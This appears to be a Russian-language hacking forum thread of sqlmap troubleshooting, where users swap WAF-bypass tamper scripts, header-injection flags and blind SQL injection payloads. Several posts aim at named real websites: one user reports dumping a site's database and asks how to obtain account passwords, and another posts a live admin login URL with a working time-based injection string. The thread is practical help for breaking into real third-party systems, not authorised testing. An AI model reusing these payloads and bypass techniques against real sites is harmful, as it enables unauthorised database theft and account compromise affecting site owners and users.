Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. 3acuson

    3acuson Member

    Joined:
    31 Jan 2010
    Messages:
    425
    Likes Received:
    6
    Reputations:
    0
    на сервере стоит Hiawatha Webserver. Как обойти его WaF в мапе, какие тамперы можно задействовать?
    касается этой уязвимости http://www.securityfocus.com/bid/92687/info
    крутит только MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause но таблицы выдернуть не может:(
     
  2. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    832
    Likes Received:
    808
    Reputations:
    90
    надо узнать почему не может, доступ к information_schema есть? дебаг запросов юзал?
     
    _________________________
  3. 3acuson

    3acuson Member

    Joined:
    31 Jan 2010
    Messages:
    425
    Likes Received:
    6
    Reputations:
    0
    дебаг пишет [DEBUG] got HTTP error code: 441 (SQL Injection Detected) почти на все.
    пропускает запросы типа 1 RLIKE (SELECT (CASE WHEN (9434=9434) THEN 1 ELSE 0x28 END))
    возвращает ноль при запросе к счема.таблес :(
     
  4. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    832
    Likes Received:
    808
    Reputations:
    90
    да похоже на waf, "441 (SQL Injection Detected) почти на все" почти на всё, но получается не на всё, возможно слово from его смущает, попробуй запрос отправить что то типа "select 1 from 1"
    к information_schema вероятно поэтому же доступа нет
     
    _________________________
  5. NiggaVlg34

    NiggaVlg34 New Member

    Joined:
    22 Nov 2016
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Подскажите пожалуйста как узать команду --os-bof?
    Я все делаю с телефона. Скачал себе metasploit framework через терминал GNURoot Debian как требовал sqlmap, но при выполнении запроса с командой --os-bof он все-равно требует наличие метасплоита. Как решить эту проблему? Или может надо сплоит закинуть в папку какую то?

    И еще вопрос можно ли как то получить логины и пароли к ЛК на этом сайте samp-gf.ru?
    Сдампил БД через эту узвимость http://samp-gf.ru/download.php?id=3' , но ничего толкового не нашел в таблицах.

    И вот на этом сайте samp-rp.ru можно что нибудь сделать, я вроде ничего похожего на соль не нашел.
     
    #305 NiggaVlg34, 22 Nov 2016
    Last edited: 22 Nov 2016
  6. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    160
    Likes Received:
    39
    Reputations:
    1
    привет
    как вот такое крутить в sqlmap

    Request
    GET /authenticate.php HTTP/1.1
    Referer: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    X-Requested-With: XMLHttpRequest
    Host: wwwl.accuweather.com
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    Accept: */*


    HTTP/1.1 302 Found
    Date: Wed, 23 Nov 2016 12:55:50 GMT
    Server: Apache/2.4.6 (Red Hat Enterprise Linux) OpenSSL/1.0.1e-fips PHP/5.4.16
    X-Powered-By: PHP/5.4.16
    Location: error.php?url=&mt=
    Content-Length: 43
    Keep-Alive: timeout=5, max=64
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
     
  7. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,033
    Likes Received:
    1,427
    Reputations:
    53
    cкулмап -у site/authenticate.php --хедер'реферер*'
     
  8. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    185
    Reputations:
    56
    --level=2 // фазит Cookie header
    --level=3 // фазит User-Agent header, и Referer заголовки
    --level=5 // фазит Host header
    Ну а в твоем случае,так как написали Выше
    Используй астерикс (*)

    --user-agent="sqlmap*" // тест иньекции в user-agent

    --referer="target.com*" //тест иньекци в referer

    --headers="User-Agent:test*\nReferer:bla" // Тоже самое что и --referer="blas" --user-agent="pipiska*"

    --headers="MegaHeader= BigPipiska*" // Поиск скули в заголовке MegaHeader

    Или же просто поставь астерикс(*) в нужном месте для иньекции в твоем request.txt
    -r request.txt
     
  9. passwd

    passwd New Member

    Joined:
    23 Dec 2010
    Messages:
    82
    Likes Received:
    2
    Reputations:
    5
    Подскажите почему так происходит и как это можно обойти.

    Начал раскручивать /page.aspx?id=1
    Вот так выглядел запрос:
    Code:
    --random-agent --time-sec 20
    Ответ "connection timed out", даже если добавить --hpp
    [​IMG]
    Затем попробовал добавить tamper:
    Code:
    --hpp --tamper=charunicodeencode,percentage,chardoubleencode --random-agent --time-sec 20
    В итоге "500 internal server error":
    [​IMG]

    Затем, после десяток попыток и экспериментов с разными запросами, оно всё же получило свой payload и отобразило --current-db. При чем без прописывания --tamper или --hpp. Вот что показал --banner.
    [​IMG]

    Но вся проблема теперь состоит в том, что не хочет отображать таблицы.
    Code:
    -D *** --tables
    [​IMG]
    Количество таблиц определяет, но имена не хочет. Вот как реагирует если добавить --hpp --parse-errors:
    [​IMG]
    Та же проблема если использовать --common-tables:
    [​IMG]

    Как такое можно обойти?
     
    #309 passwd, 25 Nov 2016
    Last edited: 25 Nov 2016
  10. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    832
    Likes Received:
    808
    Reputations:
    90
    если оно само заработало, может на сервере ограничение запросов в минуту например?
    попробуй --delay=2 выставить, ну попытка не пытка
     
    _________________________
  11. passwd

    passwd New Member

    Joined:
    23 Dec 2010
    Messages:
    82
    Likes Received:
    2
    Reputations:
    5
    Попробовал, каждый раз с раного IP.
    Code:
    --dbms="Microsoft SQL Server 2014" --os="Windows" --random-agent --time-sec 10 --delay=10 --no-cast --parse-errors --tables --hpp
    В ответ:
    Code:
    [15:04:50] [WARNING] parsed DBMS error message: 'System.Data.SqlClient.SqlException: String or binary data would be truncated'
    без --hpp:
    Code:
    [15:06:44] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
    с --tamper=почти любые:
    Code:
    [10:49:14] [WARNING] unexpected HTTP code '404' detected. Will use (extra) validation step in similar cases
    Далее пробовал самостоятельно подставлять -T [user] -C password и т.д.:
    Code:
    [12:31:07] [WARNING] parsed DBMS error message: 'System.Data.SqlClient.SqlException: Invalid object name 'database_Name.dbo.tbl_Users''
    Пробовал брутить с помощью --common-tables, на каждый запрос:
    Code:
    [12:55:00] [DEBUG] got HTTP error code: 500 (Internal Server Error)
    [12:55:00] [WARNING] parsed DBMS error message: 'System.Data.SqlClient.SqlException: Incorrect syntax near '-''
     
  12. bustudo

    bustudo New Member

    Joined:
    18 Aug 2016
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    sqlmap выводит сообщение:
    [ERROR] possible integer casting detected (e.g. "$_mode=intval($_REQUEST['_mode'])") at the back-end web application
    Что полезного несет эта информация и что следует делать дальше,дабы раскрутить инъекцию параметра как следует?
     
  13. Bobrenz

    Bobrenz New Member

    Joined:
    29 Jul 2015
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    Народ, вот тоже вопрос по ошибке во время раскрутки уязвимости

    [10:45:46] [INFO] fetching database names
    [10:45:50] [WARNING] something went wrong with full UNION technique (could be be
    cause of limitation on retrieved number of entries). Falling back to partial UNI
    ON technique
    [10:45:53] [WARNING] the SQL query provided does not return any output
    [10:45:53] [WARNING] in case of continuous data retrieval problems you are advis
    ed to try a switch '--no-cast' or switch '--hex'

    может кто подскажет как такое обойти
     
  14. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    160
    Likes Received:
    39
    Reputations:
    1
    Есть ли актуальные тамперы для cloudflare?
     
  15. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    128
    Likes Received:
    5
    Reputations:
    1
    Подскажите Blind SQL Injection

    POST /admin/login/ HTTP/1.1
    Cache-Control: no-cache
    Referer: https://site.com/admin/login/
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36
    Accept-Language: en-us,en;q=0.5
    Cookie: PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634
    Host: site.com
    Accept-Encoding: gzip, deflate
    Content-Length: 80
    Content-Type: application/x-www-form-urlencoded

    username=&password=&login=Login
    уязвимы оба параметра username,password

    '+((SELECT 1 FROM (SELECT IF((ASCII(MID((DATABASE()),1,1)) >= 53),SLEEP(5),1))A))+'

    перебором вытащила

    VERSION 5.5.47-MariaDB
    DB site_com
    USER site_com

    Sqlmap POST parameter 'username' is not injectable POST parameter 'password' is not injectable

    sqlmap.py -u https://site.com/admin/login/ --data="username=&password=&login=Login" --cookie="PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634" --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36" -v 3 -p username --dbs --prefix="'+" --suffix="+'" --technique=T

    Пробовала уже по всякому ,Sqlmap не может найти Inj

    Что я делаю не так?
    могу скинуть сайт, если подскажете
     
  16. elvir

    elvir Banned

    Joined:
    30 Nov 2016
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте помогите с этим.
    sqlmap identified the following injection point(s) with a total of 457 HTTP(s) requests:
    ---
    Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=69 AND 4268=4268
    ---
    web application technology: PHP 5.4.34, Nginx
    back-end DBMS: MySQL >= 5.0.0
    current user is DBA: False
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=69 AND 4268=4268
    ---
    web application technology: PHP 5.4.34, Nginx
    back-end DBMS: MySQL 5
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=69 AND 4268=4268
    ---
    web application technology: PHP 5.4.34, Nginx
    back-end DBMS: MySQL 5
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=69 AND 4268=4268
    ---
    web application technology: PHP 5.4.34, Nginx
    back-end DBMS: MySQL 5
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=69 AND 4268=4268
    ---
    web application technology: PHP 5.4.34, Nginx
    back-end DBMS: MySQL >= 5.0.0
    current database: None
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=69 AND 4268=4268
    ---
    web application technology: PHP 5.4.34, Nginx
    back-end DBMS: MySQL >= 5.0.0
    При попытке извелечь бд. Появляется такая ошибка:
    sqlmap error unable to retrieve the number of databases
    что делать? Название БД я знаю. Но sqlmap не может найти.?
     
  17. Zen1T21

    Zen1T21 Member

    Joined:
    13 Jan 2013
    Messages:
    154
    Likes Received:
    31
    Reputations:
    2
    Скинь уже гребаную ссылку
     
  18. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    128
    Likes Received:
    5
    Reputations:
    1
    https: //simplecoin. cz/admin/login/
     
    #318 madam, 7 Dec 2016
    Last edited: 8 Dec 2016
  19. PoliGroS

    PoliGroS Member

    Joined:
    29 Mar 2012
    Messages:
    89
    Likes Received:
    9
    Reputations:
    0
    Парни помогите, что делаю не так.
     
  20. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    832
    Likes Received:
    808
    Reputations:
    90
    --time-sec=10 это таймаут, попробуй
    --delay=1 это слип в секундах между запросами
    а вообще уровень вербозности побольше сделай
    -v 4
    и посмотри что сервер отвечает
    -----------
    судя по payload это time-based
    как сам думаешь не вешают сервак твои висящие запросы в базе)? надо было как ошибки появились - попробовать зайти на сайт, доступен ли он
     
    _________________________
Loading...